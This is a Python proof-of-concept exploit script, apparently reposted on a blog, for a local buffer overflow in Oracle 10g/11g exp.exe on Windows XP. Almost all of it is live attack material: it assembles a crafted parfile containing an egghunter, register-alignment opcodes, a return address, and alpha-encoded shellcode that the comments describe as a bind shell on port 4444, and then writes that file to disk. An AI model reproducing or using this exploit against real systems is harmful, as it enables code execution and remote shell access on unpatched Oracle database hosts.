Oracle 10/11g exp.exe Buffer Overflow

  
  
  
  
  1. #!/usr/bin/python 
  2. # Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit 
  3. # Date found approx: 9/3/2010 
  4. # Software Link: http://www.oracle.com/technology/products/database/oracle10g/index.html 
  5. # Version: 10.x and 11g r1 (r2 untested) 
  6. # Tested on: Windows XP SP3 En 
  7. # Usage: 
  8. # $ORACLE_HOME\exp.exe system parfile=overflow_oracle_exp.txt 
  9.   
  10. def banner(): 
  11.     print "\n\t| ------------------------------------- |" 
  12.     print "\t| Oracle exp.exe code execution explo!t |" 
  13.     print "\t| by mr_me - net-ninja.net ------------ |\n" 
  14.       
  15. header = ("\x69\x6E\x64\x65\x78\x65\x73\x3D\x6E\x0D\x0A\x6C\x6F\x67\x3D\x72\x65\x73\x75" 
  16. "\x6C\x74\x73\x2E\x74\x78\x74\x0D\x0A\x66\x69\x6C\x65\x3D"); 
  17.   
  18. # aligned to edx 
  19. egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1" 
  20. "9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA"); 
  21.   
  22. # bind shell on port 4444, alpha3 encoded and aligned with edi 
  23. sc = ("hffffk4diFkDwj02Dwk0D7AuEE4n07073K023H8O8L4t8O1M0z110q160q150e2N0n7K0i1K130" 
  24. "J0g0i1400110t16090y150r0V122l0s080o0y0r2M0s13150r122k0t0W0q2M0e0v0t0a0s110q000p1" 
  25. "P0h2m0j0A0s0q0z7m1M2x1N1N142G1N7l0t0r1N2F1O061O7m1M121O010g0x0i1K0f04130t107p180" 
  26. "10t2y0s2Z0j130w7p1P7l0g051P2N1N08191N147k0q1K0h7o0d2r0b2I122F1N2I1N130c2Z0d2Z187" 
  27. "l0d2F0i2l122H1O2o122l1M1M2k191K180o2N1L020g05112o1N2j1M121P0w112k1K2F1O2k1N0y121" 
  28. "90e0w0r2M0r7m0g2J1O100h2I0e0r0c0r1P7o1O0x117k0i0v1P0z147o0z060e7m0s7K102A1O0p100" 
  29. "90e7k0y2y2o2B162A0r1K0p2q0d2m1M2o0s0z1M1O0w150y0v0c2I132Z0i190t2F0g2D182F0u7l0q2" 
  30. "O0x120y0p0f2l0a7N17130w7N0i0c0t030b2t1N2F172u1N0p0z2M0c2O1O2n162J0g2D0g0x142k122" 
  31. "k112E0g0u0u2O0v1912120g2M0d0v1N191L0r0f2D1N131O121O0y0c2E0u0z1N0y1O7p14170z2O1O1" 
  32. "50g0s0y7M1N7m0a0u122N0d170t120a101M2I1L1416001L1K0a1L1O2H0z000e7m1M151M010r2N0u2" 
  33. "D0g190d2l0t0s142K0w2j142F157m1O2A1M2Z0g2z0a2N0p111500170r122B182H1N030x2z0v7l1K0" 
  34. "x0f2M0g7m1L0q0e2J0x2E1M7o1119100q0w1414101O021L0z161O0z2H1M7k0r001L7n0g7p1M2j1L0" 
  35. "u1714157m1N191M2Z14041N2M0v2E19140f2H0e7l1O021L2o0d1915010t0p15061O041M7p1K130g0" 
  36. "t1L2s172A1M0p17030w191O2O1O110d0w1M141M7m117p0f070t1716020w0q0f040f09182C1L7p0f2" 
  37. "C0b170d1N0c1M1L7n1O191N2E162E0d7m0h0w1N2C0q061M2m1M2j1K0g1M010e13127p1O7n0f130b7" 
  38. "p1K120i130u2D0b1M0x110z2L0x2n0v2C0g2H1N0w0y2C1P1M1M2N0f0w0f2j1O2O1M7n0u02172k150" 
  39. "7140x0d0s141N0v2F0b2l152E0u03142o0t0v1N2n1M080f2K0x2m1L2k110c1M2l141M1N171M050f2" 
  40. "L1M2j1O0213051N2l1M020i180r7n1N0w190q1L7l14101N171L0q0e2H1O011M0311121O7N1K2O1N2" 
  41. "C16060d1M1M161M2K1N0u1M2N01VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEJN" 
  42. "0I673K0L3N8O8L5D8O131J171A161A151T7N6N7K1Y15121J1W6O1510111D17191I151C1W17LL1E68" 
  43. "6O1I1C7M1C1M151C13LK1E1W1GLK1U1G1E1Q1C116P106P1Q1YLM6K1A1C1A1KLL1L691N1K1J171O7Z" 
  44. "1B1B1H161N161NLL1H121N111W161Y1K1W15131E1N1019101E691BLL64151F601QLM1V141Q7N1O18" 
  45. "191N127J6P1K6N7O1T631S681L161H181O131R7Z1U7Z19LM7O171YLM161Y1OLO12191M13181I1K19" 
  46. "6O681M141V1511191M1J1M131Q1G117Z10171OLN1N1I12181T1G1C7M1C1C1V7J1O101Y681T1C1S1B" 
  47. "1QLN1O16171K1Y1G1Q1K15LN1N1F1TLLLMLM161O1O1F11181T1K1I681D1317601C1J6P601QLM1MLN" 
  48. "1B1J1M1O1G151I6P1S18157K1Y191B101W1419661A1M6P7N1L1C1ILN1U1L1Q68141B1G7O1Y1S1E12" 
  49. "1W641O6712651N1A11LL1T141L1O177J69151W1L177J12LK1O151W1E1F1J1F19121L1T1N1T161N19" 
  50. "1L1C1P141J1E1O131N1O1R641D1J1N1I1L1F14141ILO1O151W1B1I7L1OLM1Q1E177O1T1L1G1C1Q10" 
  51. "13LL1L1417101L1K1Q1M1N691K101TLL1H151L101D101D651R191TLL1D1C157J1C1K156714LL1N61" 
  52. "1L7Z1W7K7JLO6P11141N171D141219681O121H7K1GLM1K1I7MLL1V191M111T7K131411111JLO101G" 
  53. "1D7Z14101N141L1K171N1K691K7K1C101H1O1TLK1N1K1L1D131E14LL1N181K7J101E1O6818151914" 
  54. "68191TLM1N121LLO1T1914111D6P14161I621L601H1B1W1B1I1216611M6P16151D1O1N7O1L1A1T1F" 
  55. "1I1D1L1917111P661A1617161G101W147J1719601O101W631S1A1T1M1SLL1MLN1O181O6517651ULL" 
  56. "1Y1F1O661E1F1MLL1I1K1K1R1I1A1U1313611N1E68121S671H1I1Y101F151R1L1M111L1B1K1O1G63" 
  57. "1V7L1N1D1L121P1M13LN1V191U1J1N7O1LLN1D1114LN1417141H1T1C14101G651QLO14651D1C14LO" 
  58. "1D1F1NLN1L191W7M1K1M1LLO11651MLL141L1N161L131W7M1I1K1N1312151NLL1L121YLK1D181N1G" 
  59. "191B1MLO1J101N171L1A1T681N101L1311131O7O10LO1O6317161T1H1H171L7K1NLN1L7M01WWYA44" 
  60. "44444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABAB" 
  61. "QI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBJKKS0YJKKU9XJXKOKOKO0O0I0I0I0I0I0I0" 
  62. "Q0Z0V0T0X0603000V0X0411000B060H0H000B03000B0C0V0X020B0D0B0H041102110D00110D0T0B0" 
  63. "D0Q0B00110D110V0X040Z080B0D0J0O0M0N0O0L060K0N0O0D0J0N0I0O0O0O0O0O0O0O0B0V0K0X0N0" 
  64. "V0F020F020K080E0D0N0C0K0X0N0G0E0P0J0W110P0O0N0K080O040J110K0X0O0U0B0R11000K0N0C0" 
  65. "N0B0S0I0T0K080F0S0K0X11000P0N11030B0L0I090N0J0F0X0B0L0F0W0G00110L0L0L0M0P11000D0" 
  66. "L0K0N0F0O0K030F0U0F0B0J0B0E0W0C0N0K0X0O0U0F0R110P0K0N0H060K0X0N0P0K040K0H0O0U0N1" 
  67. "111000K0N0C000N0R0K0H0I080N060F0B0N11110V0C0L110C0B0L0F0F0K0H0B0T0B030K0X0B0D0N0" 
  68. "P0K080B0G0N110M0J0K0H0B0T0J0P0P050J0F0P0X0P0D0P0P0N0N0B050O0O0H0M110S0K0M0H060C0" 
  69. "U0H0V0J060C030D030J0V0G0G0C0G0D030O0U0F0U0O0O0B0M0J0V0K0L0M0N0N0O0K0S0B0E0O0O0H0" 
  70. "M0O050I0H0E0N0H0V110H0M0N0J0P0D000E0U0L0F0D0P0O0O0B0M0J060I0M0I0P0E0O0M0J0G0U0O0" 
  71. "O0H0M0C0E0C0E0C0U0C0U0C0E0C040C0E0C040C050O0O0B0M0H0V0J0V11110N050H060C050I08110" 
  72. "N0E0I0J0F0F0J0L0Q0B0W0G0L0G0U0O0O0H0M0L060B01110E0E050O0O0B0M0J060F0J0M0J0P0B0I0" 
  73. "N0G0U0O0O0H0M0C050E050O0O0B0M0J060E0N0I0D0H080I0T0G0U0O0O0H0M0B0U0F050F0E0E050O0" 
  74. "O0B0M0C0I0J0V0G0N0I070H0L0I070G0E0O0O0H0M0E0U0O0O0B0M0H060L0V0F0F0H060J0F0C0V0M0" 
  75. "V0I080E0N0L0V0B0U0I0U0I0R0N0L0I0H0G0N0L060F0T0I0X0D0N110C0B0L0C0O0L0J0P0O0D0T0M0" 
  76. "20P0O0D0T0N0R0C0I0M0X0L0G0J0S0K0J0K0J0K0J0J0F0D0W0P0O0C0K0H0Q0O0O0E0W0F0T0O0O0H0" 
  77. "M0K0E0G050D051105110U11050L0F110P1105110E0E05110E0O0O0B0M0J0V0M0J0I0M0E000P0L0C0" 
  78. "50O0O0H0M0L0V0O0O0O0O0G030O0O0B0M0K0X0G0E0N0O0C080F0L0F060O0O0H0M0D0U0O0O0B0M0J0" 
  79. "60O0N0P0L0B0N0B060C0U0O0O0H0M0O0O0B0M0ZKPA"
  80.   
  81. # align edx 
  82. # MOV EDX,ESP 
  83. # SUB EDX,64 
  84. # SUB EDX,64 
  85. # SUB EDX,64 
  86. # SUB EDX,32 
  87. # SUB EDX,64            
  88. # JMP EDX 
  89. align = ("\x8b\xd4\x83\xea\x64\x83\xea\x64\x83" 
  90. "\xea\x64\x83\xea\x32\x83\xea\x64\xff\xe2\x43"); 
  91.   
  92. exploit = header 
  93. exploit += "\x43" * 39 
  94. exploit += align 
  95. exploit += egghunter 
  96. exploit += "\x41" * (533-len(exploit)) 
  97. exploit += "\xe9\x2a\xfe\xff\xff" 
  98. exploit += "\xbb\x8b\xe2\x61" 
  99. exploit += "\xeb\xf5" 
  100. exploit += "\x41" * 100 
  101. exploit += "\x57\x30\x30\x54" * 2 
  102. exploit += sc 
  103. exploit += "\x43" * (6000-len(exploit)) 
  104. exploit += ".dmp" 
  105. banner() 
  106. print ("[+] Shellcode byte size: %s" % (len(sc))) 
  107. print ("[+] Writing %s bytes of exploit code to param file" % (len(exploit))) 
  108. pwnfile = open('overflow_oracle_exp.txt','w'); 
  109. pwnfile.write(exploit); 
  110. pwnfile.close() 
  111. print "[+] Exploit overflow_oracle_exp.txt file created!" 

 

你可能感兴趣的:(oracle,数据库,职场,休闲)